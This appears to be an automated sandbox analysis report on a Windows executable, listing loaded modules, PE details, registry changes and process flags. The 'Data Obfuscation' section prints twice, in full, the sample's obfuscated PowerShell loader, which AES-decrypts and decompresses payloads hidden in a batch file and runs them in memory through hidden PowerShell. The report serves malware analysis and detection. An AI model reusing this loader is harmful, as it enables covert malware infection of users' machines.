Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: XgKnAQpuPM.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: XgKnAQpuPM.exe Static file information: File size 3571712 > 1048576
Source: XgKnAQpuPM.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x359000
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: XgKnAQpuPM.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: XgKnAQpuPM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: XgKnAQpuPM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs .Net Code: _F6A9_24CA_2622_EF60_FFFD System.Reflection.Assembly.Load(byte[])
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Binary contains a suspicious time stamp
Source: XgKnAQpuPM.exe Static PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF776D11D10
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D115F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00007FF776D115F4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
